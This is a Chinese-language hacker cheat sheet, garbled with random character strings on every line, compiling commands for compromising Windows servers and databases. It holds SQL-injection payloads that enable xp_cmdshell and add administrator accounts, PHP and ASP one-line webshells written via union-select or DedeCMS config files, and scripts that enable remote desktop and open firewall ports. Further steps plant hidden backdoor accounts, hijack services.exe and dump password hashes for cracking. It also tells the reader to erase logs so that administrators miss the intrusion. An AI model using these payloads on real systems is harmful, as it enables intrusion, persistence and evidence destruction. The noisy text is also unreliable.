" j$ l1 k& c) v! S1.net user administrator /passwordreq:no
2 i; F/ R9 n. b1 n- g( V- _这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了& U) U( L. b1 L# o. n' r0 c
2.比较巧妙的建克隆号的步骤
7 A4 |. c0 _& ?6 s: o# T先建一个user的用户
1 I5 |: Y' {& x! |4 K9 p7 w然后导出注册表。然后在计算机管理里删掉
2 q# _' Q0 ~# @" U; N在导入,在添加为管理员组
1 [" | P8 C/ y' {& H, j3 o; @3.查radmin密码
( a* r3 [% F# x1 B. ~7 {reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg9 J. @+ |! }- B) y! L$ U
4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]! u1 c" a, G* O/ m
建立一个"services.exe"的项; f9 \/ w3 S4 D, r k* Z
再在其下面建立(字符串值)% s1 j2 m* M" c9 a* K# F7 U# q/ l0 g( w
键值为mu ma的全路径
8 y, S7 T5 }8 _. n5.runas /user:guest cmd. _/ W. \ i5 J9 @1 t
测试用户权限!
6 D9 ]) i' f, n6 m A$ d6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?3 z$ j. v8 a8 S
7.入侵后漏洞修补、痕迹清理,后门置放:
% t3 D% D3 v1 @# _基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门& z. ]* ^( r5 e% B* E
8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
% x" r# a t. I2 X4 _( {
% [. Y" z& R- Q1 U8 S5 k) Ffor example* v) l* S8 l: g
' S& r, W) N( J: zdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'# k8 a {- }3 E6 z4 I
" q1 Q9 p0 E) g3 M- ^declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add', O) Z I# G" B8 A+ \
1 d9 l& m; A e8 H- v. b7 D9:MSSQL SERVER 2005默认把xpcmdshell 给ON了& c# i* p2 m$ A' ]" }
如果要启用的话就必须把他加到高级用户模式. `( m! I7 N: d: j8 w
可以直接在注入点那里直接注入
+ A& q( Y. A* J/ F/ X k% hid=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
$ V; z5 p4 o$ M& z3 l, V* r' f然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
; l2 l: E* \2 R# T5 B2 \或者
( {' K6 [7 j1 z+ R2 w/ L7 Asp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
; G0 m/ g' S! t: ^+ q来恢复cmdshell。/ F6 [" Y2 j( p9 j e0 g& S+ \
* M" v+ O4 I0 \7 F$ @
分析器- r& ~7 \9 R& ?5 a
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--$ O& q3 D- K( t2 |" |5 u( g7 K3 t/ {
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
: [" l, g" S6 s- f" Q10.xp_cmdshell新的恢复办法 B ?4 k" t! |# Y: ~
xp_cmdshell新的恢复办法
" W( A* {, }3 k( P9 S/ u" {扩展储存过程被删除以后可以有很简单的办法恢复:) T! j% [( ?2 g8 M) a% H
删除
3 Z! x9 K6 z; m) k! v/ `& k fdrop procedure sp_addextendedproc
* W N" Z3 U1 \drop procedure sp_oacreate! s( m4 i/ F2 Q8 \ n& I
exec sp_dropextendedproc 'xp_cmdshell'
* g9 `+ J4 d% J1 |/ b+ [7 t# d
6 y R* t- ~4 S2 L; N2 V+ J. ]# O1 x恢复: J; x' W$ d, j9 b) z8 q
dbcc addextendedproc ("sp_oacreate","odsole70.dll")) N& j8 `) j. m/ \ D4 s8 _
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")' u2 e! b( k9 M0 _' h6 `. |: {
; \8 c) c% A3 a1 _' d这样可以直接恢复,不用去管sp_addextendedproc是不是存在
2 \% \6 V1 [ B" r4 ~ P% G3 d* b. E! W+ [
-----------------------------5 d4 c) i! Z; A. ]8 n0 e5 C
# |( a3 D7 I3 ]- Y9 ]
删除扩展存储过过程xp_cmdshell的语句:
: L' y" C( Z: t( b% B, Hexec sp_dropextendedproc 'xp_cmdshell'# x4 E1 Q- \, M# _& {
! W5 S$ w- r/ Q: ?3 i2 ]8 R" B H恢复cmdshell的sql语句
f' C z& b1 Y) \) Hexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'; P0 l% B$ m& q/ k: b0 u
3 X4 H4 m" t8 M' g( T
. I' i. j! Z; F; C! y; E! m
开启cmdshell的sql语句
' t+ V; e9 f; ~4 n, E6 j4 b7 @5 ?: f! P: U5 F. ^/ Y8 C
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'% {1 w3 E: h5 B( r
, _) |6 u# j% y
判断存储扩展是否存在: h, r# [8 @, Y5 `$ J
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'6 r) p4 o0 s& c% \2 u& n( e# x
返回结果为1就ok0 b8 `; ]* h! [. M3 K1 z( y
( x8 @/ l- }0 b( a7 e
恢复xp_cmdshell8 B Q1 j# @: c
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'# r, j7 z) E( [& h7 r' J, U
返回结果为1就ok2 @0 o: Z" J; m1 \
" y* H0 H- R k, F) J否则上传xplog7.0.dll& y% t3 I! \) _; d6 V
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
/ ~; o' j) u, X7 ?$ p* _; q1 C/ {" U! W6 G1 L* t6 S \
堵上cmdshell的sql语句/ J; [- b" z$ Q) w* z
sp_dropextendedproc "xp_cmdshel
% l% ]& J2 |& E& ^-------------------------( s/ G* r7 I$ b+ m
清除3389的登录记录用一条系统自带的命令:
6 G9 t# D4 d8 F* l9 O, k+ Ereg delete "hkcu\Software\Microsoft\Terminal Server Client" /f7 G+ d# Q; z+ |4 p4 ]! C
' g4 A6 W1 V3 R2 \. q7 ^然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件% y- U1 I& b6 e' D( K( Q
在 mysql里查看当前用户的权限
0 f/ ? U: s& _& `/ Xshow grants for 8 J" T' [( W+ B
4 A2 b! w8 N) U6 ]+ y以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。* G& l4 X% u( m. I! [3 \1 C
$ Z% P4 {4 ]% ]5 P
% O; F& z l& v* e# c1 `Create USER 'itpro'@'%' IDENTIFIED BY '123';: n: r) e# v! F7 c
0 h: R' T& g e+ }! l U# _& Q6 |8 q
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
# ]; q5 \6 O7 |4 I8 |% d7 r1 S* F1 K; A/ O- {& P4 M2 ]/ y7 s
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0 g* }: H1 M) [7 Z/ o
4 X4 N# o; i; e7 h( L2 GMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;% s' ~& _. k/ E. s; T' D
1 T* }# P# n: v* r搞完事记得删除脚印哟。
8 G" t* w, B2 ~ m$ v* g$ n' k' r0 k. w' h" W. L# ~+ M. |& V; [$ s
Drop USER 'itpro'@'%';
! ?: I- j+ t6 f1 R- O" _
& K1 m& D1 N2 q& DDrop DATABASE IF EXISTS `itpro` ;6 z$ q% |; o. s( P) Q8 Z% E) i
1 P7 Z0 H u Q! R
当前用户获取system权限
0 @9 L' H: G0 a# E) W# p wsc Create SuperCMD binPath= "cmd /K start" type= own type= interact0 u8 n( C; l+ V. a$ o' a/ ~
sc start SuperCMD
$ Z; B( g5 t9 H程序代码- l) ~5 |3 K1 p4 E8 l' K
<SCRIPT LANGUAGE="VBScript">
) l' B7 r: S5 g1 e8 p+ ]0 a* Fset wsnetwork=CreateObject("WSCRIPT.NETWORK")
! J# t7 d( ~' H9 Dos="WinNT://"&wsnetwork.ComputerName, B# _- t2 P* H% o5 m7 @3 n
Set ob=GetObject(os), k7 B* o9 d4 [
Set oe=GetObject(os&"/Administrators,group")
! Y' ^% Z! A6 Y$ f: s+ f6 kSet od=ob.Create("user","nosec")
* w* ~+ r: `! v1 sod.SetPassword "123456abc!@#"7 s1 E8 a' r3 R+ y
od.SetInfo
\# _; x4 \+ |+ MSet of=GetObject(os&"/nosec",user)4 j- f- E+ F b( F' B! z! E, ^) m
oe.add os&"/nosec"& t, z7 d! v- o4 v* ?0 l
</Script>
, i3 G+ N2 B3 ^# q m<script language=javascript>window.close();</script>
: ~" T) ^* p/ |8 ?: ?5 Z& f; ?6 p
" j: v5 F" D" P8 T8 P" C+ `* F9 S* I
. q4 t/ y0 B. J! m$ T
突破验证码限制入后台拿shell
' Z8 n0 g1 z# {程序代码 ]: | c, X" v7 R1 |! T2 D
REGEDIT4
' s# h+ l, [1 {- Z* n% R8 T[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security] 4 P l' {" m2 {1 M. I
"BlockXBM"=dword:000000005 Q! `, `- H z
% ]' _# ~" Y) q/ Q
保存为code.reg,导入注册表,重器IE
w2 W2 A7 L- V3 a就可以了- v4 p+ U3 `! [( V; O4 ?
union写马$ m: v8 F1 L9 R
程序代码7 X4 y& R$ E1 `' I+ n4 Q5 E2 m
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*
% Z. [# O6 C# c) k J" j8 B2 \% ~# W# N. s+ m4 n' L% {- d
应用在dedecms注射漏洞上,无后台写马
l2 D" q$ R+ E$ e$ v5 K; cdedecms后台,无文件管理器,没有outfile权限的时候0 \7 w7 e. m: g7 w! L
在插件管理-病毒扫描里
# q5 s- a, n$ V& z, r% c; Y写一句话进include/config_hand.php里$ i0 @* s7 p# C- g$ r
程序代码7 x. u) g- _/ g W4 e" t
>';?><?php @eval($_POST[cmd]);?>4 I J5 u$ l. c+ U6 X
2 L- i- w- Y- l( m+ ]4 w
! F: l' B8 h& K& l如上格式8 A. @; @3 E2 c8 x" w
" h& g" K9 A6 [ E* j7 p9 o
oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
$ n* D% ]: b" b |, M% o程序代码
) ~) p$ n; |7 a% } R5 y$ Lselect username,password from dba_users;( S5 e. r8 Q( {
' e! q5 R5 y5 h7 n) A! ~8 @
@' T3 E% J# v- W3 Z" D$ Amysql远程连接用户4 o' @8 x+ A8 A
程序代码: u. R9 [" L- m0 X- d
% I' n3 x/ o8 `: o
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';, ]5 z% _+ \$ m" i
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION+ A5 K# m: Q' a9 E( i+ u
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
3 i M! E% F" U# QMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;# r: `0 z' L' [* a5 `7 k5 ]2 A6 d
1 k5 d4 i+ P8 W* s( \ Q+ g
% I0 F/ D& K3 O. y# y) b3 I* W2 P1 v3 P k
! \1 {9 n$ R l4 @6 q v! `echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
7 x4 `9 |' K( {: V M$ _$ Q
' f0 ~' N7 ] Y! I! }$ |3 a1.查询终端端口9 [9 g7 \0 n# u) S1 g
$ B- u/ T" M. J7 ]$ z" @xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
8 S7 U% W/ V2 C6 H, U6 u: E" A9 Y+ z8 b
通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
0 L& ?! S j: V/ ]% s1 o$ Otype tsp.reg
; R N% M6 S0 P* `3 s' f" r* |; L7 `3 @
2.开启XP&2003终端服务
9 g+ |- q) m% q2 L/ Y r3 q/ k$ J M/ Y2 m
6 H+ M" ~$ n6 h# t- PREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f: E& t2 m4 J+ B1 g2 a* X/ V7 p
0 L/ g- Z4 {- d5 I$ \% B% n- W( e9 q1 L6 n: `8 R
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
9 Z* ?( y# \! H
) u; t# `4 m8 d) J; Y/ k. Z3.更改终端端口为20008(0x4E28)8 D$ g3 t2 ]$ s( y3 L; W
5 W3 x! g. V0 d; T% I& |% E7 F) }REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f& |6 O8 W! L. K6 \2 S! l* ] I
" Q) W% Z4 d l5 Z& f" i# |8 NREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
3 I2 }4 z. k, K. o3 @, r1 K
7 u, A8 X# u7 D& S0 S; x, _4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制
- O1 m7 x2 O+ |$ W9 \: v) N* I) n
7 t. ^: B' O- ?( B) @ |+ ^REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f
! y2 y4 M H- Q/ a0 o6 L! S/ u
& c" y7 E- @) |3 V; L3 i9 r; _ Q6 V8 d( U' E
5.开启Win2000的终端,端口为3389(需重启)' X7 F9 r! a8 s# Q" a" Y) R5 k
f' l! ]' z) L+ i* [6 i! \# y' Vecho Windows Registry Editor Version 5.00 >2000.reg
; s$ G! Y& z+ \ H gecho. >>2000.reg
. W! r* p P1 |5 `. `/ M& {echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg , I. K1 a# R% j0 |7 h' i U
echo "Enabled"="0" >>2000.reg
2 W, `. I5 E# m; ?6 c2 C) k4 a- Techo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg 7 Q2 ]4 L9 }# q9 p
echo "ShutdownWithoutLogon"="0" >>2000.reg
9 b8 T" D5 c% v' Uecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg ) [8 M4 f/ Z8 w/ D
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg
$ h' G) L6 r: _. oecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg . P" u; \! c. y ^1 q' i
echo "TSEnabled"=dword:00000001 >>2000.reg $ L& t& T, |, ~& E0 H
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
" u [0 Y4 g9 N; ]echo "Start"=dword:00000002 >>2000.reg - o% F4 K! u* W1 Z# {6 t
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg $ {1 u$ I5 Y! U3 A6 }, n, m& y: l
echo "Start"=dword:00000002 >>2000.reg : X' V, f" X2 G5 A9 X/ C1 U; ]( [
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
/ [1 Q- y) D+ |# |echo "Hotkey"="1" >>2000.reg 4 D$ c8 m# Z3 l
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg , \! @6 x8 s4 P# D# q( C
echo "ortNumber"=dword:00000D3D >>2000.reg ! R6 e& ~; Z0 F0 e
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
, r0 i6 o( l' {0 Z, t! Becho "ortNumber"=dword:00000D3D >>2000.reg
5 y( t |" {3 j/ p ^" K F: V5 E: f1 G
6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
! O9 P7 I8 P- Y& J3 b+ l$ b: N: ?4 r* `. t* _$ A
@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
- J/ z4 E) f7 {9 q& P& w5 f(set inf=InstallHinfSection DefaultInstall)
4 |4 Z, M5 O G( iecho signature=$chicago$ >> restart.inf& o$ s* q0 H F5 U0 V% D) \4 x
echo [defaultinstall] >> restart.inf4 \! ^( [! r8 U, L
rundll32 setupapi,%inf% 1 %temp%\restart.inf) F% G1 R$ K% o; g; m
% j4 Y# ]( z. A; [2 @6 W* N9 O, Q" u b% ?# B. d* ]! `5 }) G
7.禁用TCP/IP端口筛选 (需重启)
/ L0 E+ B/ `% A2 {; |+ ^& d$ x$ J- R0 E4 a
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f4 p0 n/ n: E: K4 Q% n
- ^# ~( [' J$ |5 y' E i( {8.终端超出最大连接数时可用下面的命令来连接
' [3 d% `4 I' e- N- l5 O* z" U2 N1 L8 `& r
mstsc /v:ip:3389 /console& N) \3 B) F* {. i
, \' h. O& U4 w. e3 h9 H7 U
9.调整NTFS分区权限; Q r9 P& B9 Z
9 h3 b- D" M- G8 E: _cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)" b: H/ e2 K* H# n; U
8 g. t- |2 Y) g9 W/ S+ l0 x1 gcacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)$ q1 W8 F7 a* F- a% p0 R$ y
( k* ]! p) s2 {------------------------------------------------------
. g' M$ i+ `; d& B8 y% X3389.vbs ( r8 J6 I# B2 w$ n
On Error Resume Next8 Q& D! u$ g0 [. }& p) v- e/ [! Y+ \
const HKEY_LOCAL_MACHINE = &H800000022 s# b+ m1 J% N9 D/ T! Y" n$ B
strComputer = "."
9 N. Y3 P& Q \# y7 \# J; i' TSet StdOut = WScript.StdOut9 h7 _7 Z- m7 @ [
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
) N1 E9 y0 P/ AstrComputer & "\root\default:StdRegProv"): f2 q; @8 g" N D; b7 l3 Y
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"& B. n9 b R4 r6 N+ i9 C, M7 W
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
* J8 Y& `! }+ ?; M q" W" EstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"$ q9 o2 \! G& o3 b" p! a
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
! }8 \5 }4 Q5 C. h( d4 k8 nstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
; I! G( S0 u' TstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
4 Y& i6 Z( t: I9 Q$ F$ |6 XstrValueName = "fDenyTSConnections"
. O( b! c3 _; y W; odwValue = 0! }" g# H$ L$ C& r
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue$ x: E, D* K% N$ A5 h; t' j a+ E
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
& Q" y0 i6 D" rstrValueName = "ortNumber"$ U+ n! {; V4 M2 p9 w
dwValue = 33895 m# f( ]- G( H% z! ^, q$ U* c
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue5 C7 {- p0 E, q O; M1 h
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp", J B5 z! P3 c! l9 E) j" R- \- [- p% _
strValueName = "ortNumber". u2 B$ M/ k& h! Y7 X0 z
dwValue = 3389
# L) D* X4 x' U7 \ woreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
+ h" b, r$ M* n3 lSet R = CreateObject("WScript.Shell") . U& N: `! M1 G" _# P2 p% _
R.run("Shutdown.exe -f -r -t 0") 8 D' Z. P% D; v
* Q9 n/ M8 Y9 [- i( ~1 d7 p删除awgina.dll的注册表键值
' e) t! q) q7 @2 S3 P程序代码
# `3 E5 R7 P7 z' I1 t4 x! i9 p5 `# g, ?% i
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f) @; r5 {; K% D' I
9 i/ }: ^8 y7 W
5 T6 m+ J. t7 @2 T+ T8 p3 }* [$ g x5 t% L6 J
3 Q+ i; J6 K8 ?6 T m8 B [程序代码
! ~& V! @, y7 |7 a# @HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash( r) G$ D7 W5 B9 E: A9 P
7 v* D3 d7 \' q1 f, z9 _0 o设置为1,关闭LM Hash% L8 m# v& Z$ j9 C
( R. `$ J7 d6 s$ \4 X! y
数据库安全:入侵Oracle数据库常用操作命令
8 C! J. X; o/ N p最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。
9 \- d! R1 u' A# ]0 y0 l5 }7 f1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。 j6 p9 c' H( \" ?7 d
2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
9 i7 B9 e% C- \0 g: y8 X0 m/ R. z3、SQL>connect / as sysdba ;(as sysoper)或1 |. {' Q- q5 o$ p$ R G8 j0 O, b2 z
connect internal/oracle AS SYSDBA ;(scott/tiger)* \) e) {! \9 Z" A2 Q* S! w: W f. q
conn sys/change_on_install as sysdba;
( ?' k6 i; g$ @: ?4、SQL>startup; 启动数据库实例. F5 F4 i& _) {3 K; }6 K8 N
5、查看当前的所有数据库: select * from v$database;
2 m, r+ L+ |* Pselect name from v$database;
9 F" i/ y3 U/ ^; T. l: M6、desc v$databases; 查看数据库结构字段- H) ]8 r3 Z) R( K. {3 q
7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:5 s8 O: [, c& N$ v8 V
SQL>select * from V_$PWFILE_USERS;# c; J% v+ I& q! f# N; D& T4 P
Show user;查看当前数据库连接用户
, v8 @8 R) ^% H+ s8、进入test数据库:database test;
' }& n3 t+ }0 B5 Y; G9、查看所有的数据库实例:select * from v$instance;
) \/ _ F! g' @ G6 g如:ora9i7 W7 [% j6 ~4 b9 [) o8 @, ^! f
10、查看当前库的所有数据表:
5 \; y) L. o+ l/ ]" M/ zSQL> select TABLE_NAME from all_tables;% C/ ]: i+ | }6 c6 U i& j* j
select * from all_tables;
: e' o* N2 X, n) T s; m3 H# m% PSQL> select table_name from all_tables where table_name like '%u%';) i. _9 C7 y+ d4 }$ o! y
TABLE_NAME# q1 s+ U8 N# S# Q0 `2 F' d8 [/ t1 f
------------------------------ M3 }! H, a( M- S8 Y0 g& M
_default_auditing_options_
) g% V$ i$ t" R y$ Y$ r. M11、查看表结构:desc all_tables;
* ^, P( b' v9 A, Q12、显示CQI.T_BBS_XUSER的所有字段结构:
. Z w- e: f, Z! Q2 ?desc CQI.T_BBS_XUSER;# X: s' O2 {; ]3 n' H: C- I
13、获得CQI.T_BBS_XUSER表中的记录:$ A* [" D2 Y( V
select * from CQI.T_BBS_XUSER;
9 d: x+ W# ^" e1 U14、增加数据库用户:(test11/test)
: c/ ^' L+ x" \+ Ccreate user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
) t7 t; s5 k' T' Y, s15、用户授权:8 j8 U, S4 J0 J& d2 U
grant connect,resource,dba to test11;
7 b# J, H% E6 D: l. `grant sysdba to test11;" z5 Z( k u9 n& F
commit;' B3 R6 q7 T8 b* Q) J, N
16、更改数据库用户的密码:(将sys与system的密码改为test.)
6 O! D- ? N/ Halter user sys indentified by test;4 A0 E" F# m. v6 F2 M
alter user system indentified by test;
- L L: Z7 J& ?' B+ g) b! q* _5 d, V
applicationContext-util.xml% r! h0 M7 ` |, Z: _8 {# A
applicationContext.xml
+ I. C/ c! o3 J; s) w$ jstruts-config.xml
- W; x% @. ]2 H- W8 [web.xml
K+ d! {/ ?, A; Y% r+ _4 Userver.xml
$ _8 w* H, I$ s3 T; etomcat-users.xml
- u+ D6 D# Z4 _$ {hibernate.cfg.xml
7 ~6 n3 f3 S5 }- G; R% Fdatabase_pool_config.xml' Q- a/ R$ Y! r) Z: ~8 ^! B
% C7 E! W' T. Z* }( ?& o5 f, I4 K ~- J9 u: j, Q
\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置/ k: H, h$ t4 Y. L( C, D
\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini+ H7 ]2 f' E, y2 ?3 |; b
\WEB-INF\struts-config.xml 文件目录结构! E2 K; K6 h. `2 ]- z3 H2 s) q
2 E1 J) G5 J3 m1 K# X) O* @$ _6 Ospring.properties 里边包含hibernate.cfg.xml的名称
! I% Q. u" M7 g# Y0 J
6 N5 O# c) H9 V& n- y2 y$ K9 t. ]. U8 e3 F B2 @
C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml
9 W1 n; @. l3 y
$ G7 G" F: |8 {5 Y& `) G如果都找不到 那就看看class文件吧。。. P. j: Q0 @! |# Y, G( h7 Y* A
M" W$ Q2 y% `测试1:3 w. f, l9 A+ ]( w7 _
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1+ K1 L5 V1 M" j2 D0 d) {- B# V5 J& L
- V+ o" b4 d7 W/ y6 F+ {8 m7 M" O测试2:# D7 l. o% J: l" [6 @0 c( S: `
, ~" j2 a" C! i* V0 `* u8 G Tcreate table dirs(paths varchar(100),paths1 varchar(100), id int)
. T7 X$ d8 e$ a+ J- {2 ]! }& n. h& a, g5 K: L
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--+ q+ Y/ [! Q7 e, n0 q( B& V: i
* Q' z/ ?) E: U& K3 @9 f; O- k
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
1 u- R; W! E0 T+ ]
0 n" ~! T$ K( F3 E, x查看虚拟机中的共享文件:
0 `: R) X7 k8 d& q6 v, L7 e在虚拟机中的cmd中执行0 v; Y- o8 r2 V
\\.host\Shared Folders
' M2 R l/ P& `# ?' x5 c3 E+ s* ~2 C& W
cmdshell下找终端的技巧
, B. L' Q* e1 f& X+ j' y, Y. u找终端: " H( l9 G3 B* R- m) r: h* R
第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
' Z0 m5 ?" }( y! X1 P 而终端所对应的服务名为:TermService
! |. {9 J, I6 K+ `' q第二步:用netstat -ano命令,列出所有端口对应的PID值! 6 Z7 P5 }, c& n2 R" }; x3 W
找到PID值所对应的端口
; y' [8 N8 O, C0 U+ b: L1 v
! _5 F4 {8 V3 U; h5 H- p6 l查询sql server 2005中的密码hash
) {; y& D6 H! d8 [/ KSELECT password_hash FROM sys.sql_logins where name='sa'8 e/ e4 \; C3 j) x9 p
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a' P8 H& H% }; u) I" G% [! a
access中导出shell
. ^/ @- A q5 m
# y; B) E# q" n# a* R) X中文版本操作系统中针对mysql添加用户完整代码:
$ Y, J& L5 H" v& N" h- s) B" D, _- h/ Q3 N' \: k
use test;
/ m' E& K0 [4 O6 y+ i5 P( Screate table a (cmd text);
: h8 q6 r- x: R: s+ kinsert into a values ("set wshshell=createobject (""wscript.shell"") " );
